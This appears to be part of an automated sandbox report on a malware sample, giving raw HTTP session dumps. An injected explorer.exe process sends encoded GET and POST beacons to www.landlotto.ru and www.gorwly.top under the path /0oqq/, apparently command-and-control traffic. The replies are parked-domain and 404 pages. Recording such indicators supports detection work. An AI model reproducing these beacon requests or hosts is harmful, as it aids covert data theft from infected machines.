YY4l6ngs2tEu72TPnzav0NT_hxMtPHMbemrG6Jzj71kfnt5-dt373MDa7l1QY641CFsR4RTPOlWbBmEWuGTmRU~6Cp
                                                                                                                      Mar 20, 2023 09:09:40.718149900 CET204INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Mon, 20 Mar 2023 08:09:37 GMT
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Data Raw: 66 37 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 4c 41 4e 44 4c 4f 54 54 4f 2e 52 55 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 52 55 2d 43 45 4e 54 45 52 20 2d 20 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d1 82 d1 80 d0 b0 d1 86 d0 b8 d1 8f 20 d0 b4 d0 be d0 bc d0 b5 d0 bd d0 bd d1 8b d1 85 20 d0 b8 d0 bc d0 b5 d0 bd 20 2e d0 a0 d0 a4 2c 20 2e 52 55 2c 20 2e 53 55 2c 20 2e 43 4f 4d 2e 2e 2e 20 d0 a5 d0 be d1 81 d1 82 d0 b8 d0 bd d0 b3 20 d1 81 d0 b0 d0 b9 d1 82 d0 be d0 b2 20 d0 b8 20 44 4e 53 2d d1 81 d0 b5 d1 80 d0 b2 d0 b5 d1 80 d0 be d0 b2 2e 20 d0 9f d1 80 d0 be d0 b4 d0 b0 d0 b6 d0 b0 20 d0 b8 20 d0 bf d0 be d0 ba d1 83 d0 bf d0 ba d0 b0 20 d0 b4 d0 be d0 bc d0 b5 d0 bd d0 b0 20 d0 bd d0 b0 20 d0 b0 d1 83 d0 ba d1 86 d0 b8 d0 be d0 bd d0 b5 2e 20 d0 9e d1 81 d0 b2 d0 be d0 b1 d0 be d0 b6 d0 b4 d0 b0 d1 8e d1 89 d0 b8 d0 b5 d1 81 d1 8f 20 d0 b4 d0 be d0 bc d0 b5 d0 bd d1 8b 2e 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 d0 b4 d0 be d0 bc d0 b5 d0 bd 2c 20 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d1 82 d1 80 d0 b0 d1 86 d0 b8 d1 8f 20 d0 b4 d0 be d0 bc d0 b5 d0 bd d0 be d0 b2 2c 20 d0 a0 d0 a4 2c 20 52 55 2c 20 43 4f 4d 2c 20 d0 b0 d1 83 d0 ba d1 86 d0 b8 d0 be d0 bd 20 d0 b4 d0 be d0 bc d0 b5 d0 bd d0 be d0 b2 2c 20 d1 85 d0 be d1 81 d1 82 d0 b8 d0 bd d0 b3 2c 20 d0 bf d0 be d1 87 d1 82 d0 b0 2c 20 d0 be d1 81 d0 b2 d0 be d0 b1 d0 be d0 b6 d0 b4 d0 b0 d1 8e d1 89 d0 b8 d0 b5 d1 81 d1 8f 20 d0 b4 d0 be d0 bc d0 b5 d0 bd d1 8b 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 69 63 2e 72 75 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 73 61 70 70 6c 69 63 61 74 69 6f 6e 2d 54 69 6c 65 49 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 6e 69 63 2e 72 75 2f 69 6d 61 67 65 73 2f 77 38 2f 77 69 6e 38 74 72 61 6e 73 70 2e 70 6e 67 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 73 61 70 70 6c 69 63 61 74 69 6f 6e 2d 54 69 6c 65 43 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 33 33 39 39 46 46 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 6d 61 67 65 5f 73 72 63 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 61 67 65 2e 6e 69 63 2e 72 75 2f 72 75 2f 69 6d 61 67 65 73 2f 70 6e 67 2f 31 2e 72 63 2d 6c 6f 67 6f 2d 6f 67 2e 70 6e 67 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 55 2d 43 45 4e 54 45 52 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 73 69 74 65 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 6e 69 63 2e 72 75
                                                                                                                      Data Ascii: f7e<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>LANDLOTTO.RU</title> <meta name="description" content="RU-CENTER - ., .RU, .SU, .COM... DNS-. . ."> <meta name="keywords" content=", , , RU, COM, , , , "> <meta name="application-name" content="nic.ru"> <meta name="msapplication-TileImage" content="http://nic.ru/images/w8/win8transp.png"> <meta name="msapplication-TileColor" content="#3399FF"> <link rel="image_src" href="http://storage.nic.ru/ru/images/png/1.rc-logo-og.png"> <meta property="og:title" content="RU-CENTER"> <meta property="og:type" content="website"> <meta property="og:url" content="http://nic.ru
                                                                                                                      Mar 20, 2023 09:09:40.718183994 CET205INData Raw: 2f 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 52 55 2d 43 45 4e 54 45 52 20 2d 20 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d1 82 d1 80 d0 b0 d1 86 d0 b8 d1 8f 20
                                                                                                                      Data Ascii: /"> <meta property="og:description" content="RU-CENTER - RU, , COM, , , , DNS
                                                                                                                      Mar 20, 2023 09:09:40.718208075 CET206INData Raw: 6f 75 72 63 65 3d 73 74 70 67 5f 61 6c 6c 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 6c 6b 5f 65 6e 74 65 72 22 20 6f 6e 63 6c 69 63 6b 3d 22 67 61 28 27 73 65 6e 64 27 2c 20 27 65 76 65 6e 74 27 2c
                                                                                                                      Data Ascii: ource=stpg_all&utm_medium=link&utm_campaign=lk_enter" onclick="ga('send', 'event', 'stpg_all', 'lk_enter', 'click')"> </a> </div> </div> <div class="b-content"> <div class="b-to
                                                                                                                      Mar 20, 2023 09:09:40.718230963 CET206INData Raw: 6f 72 64 50 72 65 73 73 2c 20 d0 91 d0 b8 d1 82 d1 80 d0 b8 d0 ba d1 81 20 d0 b8 20 4a 6f 6f 6d 6c 61 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 69 63 2e 72 75 2f 63 61 74 61 6c
                                                                                                                      Data Ascii: ordPress, Joomla</p> <a href="https://www.nic.ru/catalog/hosting/cms/?ipartner=6666&adv_id=click_cmsh&utm_source=stpg_all&utm_medium=link&utm_campaign=click_cmsh" onclick="ga('send', 'event', 'stpg_all', 'promo_2',
                                                                                                                      Mar 20, 2023 09:09:40.771372080 CET208INData Raw: 31 30 30 30 0d 0a 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 62 2d 62 74 6e 22 20 76 61 6c 75 65 3d 22 d0 a3 d0 b7 d0 bd d0 b0 d1 82 d1 8c 20 d0 b1 d0 be d0 bb d1 8c d1 88 d0 b5 22 20 2f 3e 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a
                                                                                                                      Data Ascii: 1000submit" class="b-btn" value=" " /></a> </div> </div> <div class="b-present-block b-animated-block b-grad-l b-pic-3"> <div> <h2> </h2>
                                                                                                                      Mar 20, 2023 09:09:40.771415949 CET209INData Raw: 62 6c 6f 63 6b 20 62 2d 61 6e 69 6d 61 74 65 64 2d 62 6c 6f 63 6b 20 62 2d 67 72 61 64 2d 6c 20 62 2d 70 69 63 2d 35 20 6a 73 2d 61 6e 69 6d 61 74 65 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 68 32 3e d0 9f d0 b5 d1
                                                                                                                      Data Ascii: block b-animated-block b-grad-l b-pic-5 js-animate"> <div> <h2> </h2> <p> <br /> </
                                                                                                                      Mar 20, 2023 09:09:40.771441936 CET210INData Raw: 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 35 70 78 3b 22 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 69 63 2e 72 75 2f 77 68 6f 69 73 2f 3f 73 65 61 72 63 68 57 6f 72 64 3d 4c 41 4e 44 4c 4f 54
                                                                                                                      Data Ascii: e="margin-top: 55px;"> <a href="https://www.nic.ru/whois/?searchWord=LANDLOTTO.RU&ipartner=6666&adv_id=whois_info&utm_source=stpg_all&utm_medium=link&utm_campaign=whois_info" onclick="ga('send', 'event', 'stpg_all', 'whois_info', 'click'
                                                                                                                      Mar 20, 2023 09:09:40.771469116 CET212INData Raw: d0 b7 d0 be d0 bd d0 b5 20 2e 72 75 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 69 63 2e 72 75 2f 63 61 74 61 6c 6f 67 2f 64 6f 6d 61 69 6e 73 2f 63 6f 6d 2f 22 3e d0 b4 d0 be d0 bc d0 b5 d0
                                                                                                                      Data Ascii: .ru</a> <a href="https://www.nic.ru/catalog/domains/com/"> .com</a> <a href="https://www.nic.ru/catalog/hosting/shared/"> </a> <a href="https://www.nic.ru/cat
                                                                                                                      Mar 20, 2023 09:09:40.771493912 CET212INData Raw: 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 2e 74 6f 70 29 20 2f 20 28 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 48 65 69 67 68 74 20 2f 20 31 30 30 29 29 20 2f 20 31 30 30 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 6e 6f 72 6d 61 6c 69 7a 65 64 20 3d
                                                                                                                      Data Ascii: ingClientRect().top) / (window.innerHeight / 100)) / 100; var normalized = Math.sqrt(Math.min(1.4, 1 + Math.abs(scrollPercent - 1))); element.style.transform = 'matrix(' + normalized + ', 0, 0, ' + normalized + ', 0, 0)';


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      15192.168.2.349714109.70.26.3780C:\Windows\explorer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Mar 20, 2023 09:09:43.244769096 CET213OUTGET /0oqq/?ICHyvj5=zVtcFUb2erpe1riHNV8x4uTJHdjXeMKlBrPOkTLBlxKebXbCPRW4F79HIT/4WhPpl+5XC4kkcR4ywvq/sd7+lksDMuqQ2YrnfA==&qt9TW=60_ljPJoqo6d2 HTTP/1.1
                                                                                                                      Host: www.landlotto.ru
                                                                                                                      Connection: close
                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                      Data Ascii:
                                                                                                                      Mar 20, 2023 09:09:43.299485922 CET214INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Mon, 20 Mar 2023 08:09:40 GMT
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Data Raw: 31 66 37 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 4c 41 4e 44 4c 4f 54 54 4f 2e 52 55 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 52 55 2d 43 45 4e 54 45 52 20 2d 20 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d1 82 d1 80 d0 b0 d1 86 d0 b8 d1 8f 20 d0 b4 d0 be d0 bc d0 b5 d0 bd d0 bd d1 8b d1 85 20 d0 b8 d0 bc d0 b5 d0 bd 20 2e d0 a0 d0 a4 2c 20 2e 52 55 2c 20 2e 53 55 2c 20 2e 43 4f 4d 2e 2e 2e 20 d0 a5 d0 be d1 81 d1 82 d0 b8 d0 bd d0 b3 20 d1 81 d0 b0 d0 b9 d1 82 d0 be d0 b2 20 d0 b8 20 44 4e 53 2d d1 81 d0 b5 d1 80 d0 b2 d0 b5 d1 80 d0 be d0 b2 2e 20 d0 9f d1 80 d0 be d0 b4 d0 b0 d0 b6 d0 b0 20 d0 b8 20 d0 bf d0 be d0 ba d1 83 d0 bf d0 ba d0 b0 20 d0 b4 d0 be d0 bc d0 b5 d0 bd d0 b0 20 d0 bd d0 b0 20 d0 b0 d1 83 d0 ba d1 86 d0 b8 d0 be d0 bd d0 b5 2e 20 d0 9e d1 81 d0 b2 d0 be d0 b1 d0 be d0 b6 d0 b4 d0 b0 d1 8e d1 89 d0 b8 d0 b5 d1 81 d1 8f 20 d0 b4 d0 be d0 bc d0 b5 d0 bd d1 8b 2e 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 d0 b4 d0 be d0 bc d0 b5 d0 bd 2c 20 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d1 82 d1 80 d0 b0 d1 86 d0 b8 d1 8f 20 d0 b4 d0 be d0 bc d0 b5 d0 bd d0 be d0 b2 2c 20 d0 a0 d0 a4 2c 20 52 55 2c 20 43 4f 4d 2c 20 d0 b0 d1 83 d0 ba d1 86 d0 b8 d0 be d0 bd 20 d0 b4 d0 be d0 bc d0 b5 d0 bd d0 be d0 b2 2c 20 d1 85 d0 be d1 81 d1 82 d0 b8 d0 bd d0 b3 2c 20 d0 bf d0 be d1 87 d1 82 d0 b0 2c 20 d0 be d1 81 d0 b2 d0 be d0 b1 d0 be d0 b6 d0 b4 d0 b0 d1 8e d1 89 d0 b8 d0 b5 d1 81 d1 8f 20 d0 b4 d0 be d0 bc d0 b5 d0 bd d1 8b 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 69 63 2e 72 75 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 73 61 70 70 6c 69 63 61 74 69 6f 6e 2d 54 69 6c 65 49 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 6e 69 63 2e 72 75 2f 69 6d 61 67 65 73 2f 77 38 2f 77 69 6e 38 74 72 61 6e 73 70 2e 70 6e 67 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 73 61 70 70 6c 69 63 61 74 69 6f 6e 2d 54 69 6c 65 43 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 33 33 39 39 46 46 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 6d 61 67 65 5f 73 72 63 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 61 67 65 2e 6e 69 63 2e 72 75 2f 72 75 2f 69 6d 61 67 65 73 2f 70 6e 67 2f 31 2e 72 63 2d 6c 6f 67 6f 2d 6f 67 2e 70 6e 67 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 55 2d 43 45 4e 54 45 52 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 73 69 74 65 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 6e 69 63 2e 72
                                                                                                                      Data Ascii: 1f7e<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>LANDLOTTO.RU</title> <meta name="description" content="RU-CENTER - ., .RU, .SU, .COM... DNS-. . ."> <meta name="keywords" content=", , , RU, COM, , , , "> <meta name="application-name" content="nic.ru"> <meta name="msapplication-TileImage" content="http://nic.ru/images/w8/win8transp.png"> <meta name="msapplication-TileColor" content="#3399FF"> <link rel="image_src" href="http://storage.nic.ru/ru/images/png/1.rc-logo-og.png"> <meta property="og:title" content="RU-CENTER"> <meta property="og:type" content="website"> <meta property="og:url" content="http://nic.r
                                                                                                                      Mar 20, 2023 09:09:43.299519062 CET215INData Raw: 75 2f 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 52 55 2d 43 45 4e 54 45 52 20 2d 20 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d1 82 d1 80 d0 b0 d1 86 d0 b8 d1 8f
                                                                                                                      Data Ascii: u/"> <meta property="og:description" content="RU-CENTER - RU, , COM, , , , DNS
                                                                                                                      Mar 20, 2023 09:09:43.299535990 CET217INData Raw: 73 6f 75 72 63 65 3d 73 74 70 67 5f 61 6c 6c 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 6c 6b 5f 65 6e 74 65 72 22 20 6f 6e 63 6c 69 63 6b 3d 22 67 61 28 27 73 65 6e 64 27 2c 20 27 65 76 65 6e 74 27
                                                                                                                      Data Ascii: source=stpg_all&utm_medium=link&utm_campaign=lk_enter" onclick="ga('send', 'event', 'stpg_all', 'lk_enter', 'click')"> </a> </div> </div> <div class="b-content"> <div class="b-t
                                                                                                                      Mar 20, 2023 09:09:43.299555063 CET217INData Raw: 57 6f 72 64 50 72 65 73 73 2c 20 d0 91 d0 b8 d1 82 d1 80 d0 b8 d0 ba d1 81 20 d0 b8 20 4a 6f 6f 6d 6c 61 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 69 63 2e 72 75 2f 63 61 74 61
                                                                                                                      Data Ascii: WordPress, Joomla</p> <a href="https://www.nic.ru/catalog/hosting/cms/?ipartner=6666&adv_id=click_cmsh&utm_source=stpg_all&utm_medium=link&utm_campaign=click_cmsh" onclick="ga('send', 'event', 'stpg_all', 'promo_2',
                                                                                                                      Mar 20, 2023 09:09:43.353771925 CET219INData Raw: d1 81 d1 81 d0 b8 d0 be d0 bd d0 b0 d0 bb d1 8c d0 bd d1 8b d0 b9 20 d1 81 d0 b0 d0 b9 d1 82 3c 62 72 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 d1 81 d0 b2 d0 be d0 b8 d0 bc d0 b8 20 d1 80 d1 83 d0 ba d0 b0 d0 bc d0 b8 3c 2f 70 3e 0a 20 20 20 20
                                                                                                                      Data Ascii: <br /> </p> <a href="https://www.nic.ru/catalog/sites/sitebuilder/?ipartner=6666&adv_id=click_sitebuild&utm_source=stpg_all&utm_medium=link&utm_campaign=click_sitebuil
                                                                                                                      Mar 20, 2023 09:09:43.353807926 CET220INData Raw: 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 69 63 2e 72 75 2f 70 72 6f 64 75 63 74 2f 66 6f 72 2d 64 6f 6d 61 69 6e 2d 75 73 65 2f 77 65 62 2d 66 6f 72 77 61 72 64 69 6e 67 2f 3f 69 70 61 72 74 6e 65 72 3d 36 36 36 36 26 61 64
                                                                                                                      Data Ascii: a href="https://www.nic.ru/product/for-domain-use/web-forwarding/?ipartner=6666&adv_id=click_domain_forward&utm_source=stpg_all&utm_medium=link&utm_campaign=click_domain_forward" onclick="ga('send', 'event', 'stpg_all', 'promo_5', 'click_domai
                                                                                                                      Mar 20, 2023 09:09:43.353825092 CET221INData Raw: bc d0 b0 d1 86 d0 b8 d1 8f 20 d0 be 20 d0 b4 d0 be d0 bc d0 b5 d0 bd d0 b5 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 69 63 2e 72 75 2f 68 65 6c 70 2f 73 74 61 74 75 73 6e 61 79 61 2d 73 74
                                                                                                                      Data Ascii: </a> <a href="https://www.nic.ru/help/statusnaya-stranica_4785.html?ipartner=6666&adv_id=faq&utm_source=stpg_all&utm_medium=link&utm_campaign=faq" onclick="ga('send', 'event', 'stpg_all', 'faq', 'click')">
                                                                                                                      Mar 20, 2023 09:09:43.353837967 CET223INData Raw: 73 74 69 6e 67 2f 64 65 64 69 63 61 74 65 64 2f 22 3e d0 90 d1 80 d0 b5 d0 bd d0 b4 d0 b0 20 d1 81 d0 b5 d1 80 d0 b2 d0 b5 d1 80 d0 b0 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 69 63 2e 72
                                                                                                                      Data Ascii: sting/dedicated/"> </a> <a href="https://www.nic.ru/catalog/sites/sitebuilder/"> </a> <a href="https://www.nic.ru/auction/"> </a> </d
                                                                                                                      Mar 20, 2023 09:09:43.353857994 CET223INData Raw: 6c 65 2e 6f 70 61 63 69 74 79 20 3d 20 31 2b 4d 61 74 68 2e 6c 6f 67 28 73 63 72 6f 6c 6c 50 65 72 63 65 6e 74 29 3b 0a 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 7d 29 3b 0a 20 20 7d 29 3b 0a 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79
                                                                                                                      Data Ascii: le.opacity = 1+Math.log(scrollPercent); }); }); });</script></body></html>0


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      16192.168.2.349715192.64.116.16280C:\Windows\explorer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Mar 20, 2023 09:09:48.651119947 CET224OUTPOST /0oqq/ HTTP/1.1
                                                                                                                      Host: www.gorwly.top
                                                                                                                      Connection: close
                                                                                                                      Content-Length: 189
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Origin: http://www.gorwly.top
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Accept: */*
                                                                                                                      Referer: http://www.gorwly.top/0oqq/
                                                                                                                      Accept-Language: en-US
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Data Raw: 49 43 48 79 76 6a 35 3d 6d 4a 49 72 47 4b 30 6b 4a 36 58 6e 46 33 39 58 4b 76 65 71 79 6c 43 57 6a 4d 4c 67 7a 51 45 64 47 65 70 2d 68 78 72 45 78 45 32 58 4f 79 53 69 39 78 76 45 48 2d 4f 44 54 30 52 4a 36 72 56 6e 4e 45 62 69 4f 35 47 51 41 6a 43 4d 6e 78 51 66 43 43 69 71 71 77 58 32 43 34 44 6a 4a 77 36 31 48 63 73 57 67 49 55 42 62 70 48 35 70 30 52 4d 58 39 6c 61 48 70 51 32 56 4a 47 68 70 6d 75 50 76 4f 72 53 43 51 6d 35 49 53 66 4d 4d 4d 6a 64 44 50 7a 30 43 6a 55 42 4a 42 4e 79 44 43 69 41 52 54 48 49 48 74 41 39 39 4a 4f 36 7a 32 37 50 34 77 29 2e 00 00 00 00 00 00 00 00
                                                                                                                      Data Ascii: ICHyvj5=mJIrGK0kJ6XnF39XKveqylCWjMLgzQEdGep-hxrExE2XOySi9xvEH-ODT0RJ6rVnNEbiO5GQAjCMnxQfCCiqqwX2C4DjJw61HcsWgIUBbpH5p0RMX9laHpQ2VJGhpmuPvOrSCQm5ISfMMMjdDPz0CjUBJBNyDCiARTHIHtA99JO6z27P4w).
                                                                                                                      Mar 20, 2023 09:09:48.929063082 CET225INHTTP/1.1 404 Not Found
                                                                                                                      Date: Mon, 20 Mar 2023 08:09:48 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 16056
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 